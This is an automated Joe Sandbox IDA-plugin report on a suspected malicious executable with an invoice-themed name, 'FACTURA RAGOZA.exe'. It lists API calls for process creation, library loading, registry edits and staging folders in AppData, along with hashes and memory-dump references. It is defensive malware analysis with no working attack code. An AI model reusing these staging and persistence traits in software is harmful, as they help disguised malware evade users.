Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\FACTURA RAGOZA.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-280819369
Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction ID: dd1ff100f75867a5ea1a308fa9af71207a38e4cfd515e0737c49d63577dfb4aa
Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
Instruction Fuzzy Hash: D0F0E2327082047BDB109F15EC04B9B7B9CDFD1720F10C037FA04EA1C0D2B198448B98

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29

Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB

Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
Opcode Fuzzy Hash: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E

Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605

Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer,00000000,00000000,000000F0), ref: 00401634

Strings

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer, xrefs: 00401629

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer
API String ID: 1892508949-2528110863
Opcode ID: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
Opcode Fuzzy Hash: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F

Function 00404EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404EEB
CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C

Part of subcall function 00403F60: SendMessageA.USER32(00010466,00000000,00000000,00000000), ref: 00403F72

Strings

, xrefs: 00404ECC

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D

Function 004054C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
CloseHandle.KERNEL32(?), ref: 004054F6

Strings

Error launching installer, xrefs: 004054D3

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79

Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,74DF23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,74DF23A0), ref: 00404FA4
Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004

Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
Opcode Fuzzy Hash: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A

Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
RegCloseKey.ADVAPI32(?,?,?,Arabisation\argumenta\dekaderne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
Opcode Fuzzy Hash: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D

Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
RegCloseKey.ADVAPI32(00000000), ref: 00402330

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
Opcode Fuzzy Hash: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D

Function 00401A03 Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A16
lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A29

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: EnvironmentExpandStringslstrcmp
String ID:
API String ID: 1938659011-0
Opcode ID: 8d5237d9befea95f927a2a949abdd38ff93adcf4596b0f884109541de8077415
Instruction ID: c697d808c4e59c81b2ccde1a948b82941deecacae3b345ad39c5db03ab9efa89
Opcode Fuzzy Hash: 8d5237d9befea95f927a2a949abdd38ff93adcf4596b0f884109541de8077415
Instruction Fuzzy Hash: 48F08231B05240DBDB20DF659D45A9B7FA8EFA1355B10443BF145F6191D2388542DB29

Function 004060C8 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
GetProcAddress.KERNEL32(00000000,?), ref: 004060F5

Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669

Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\FACTURA RAGOZA.exe,80000000,00000003), ref: 004059A6
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
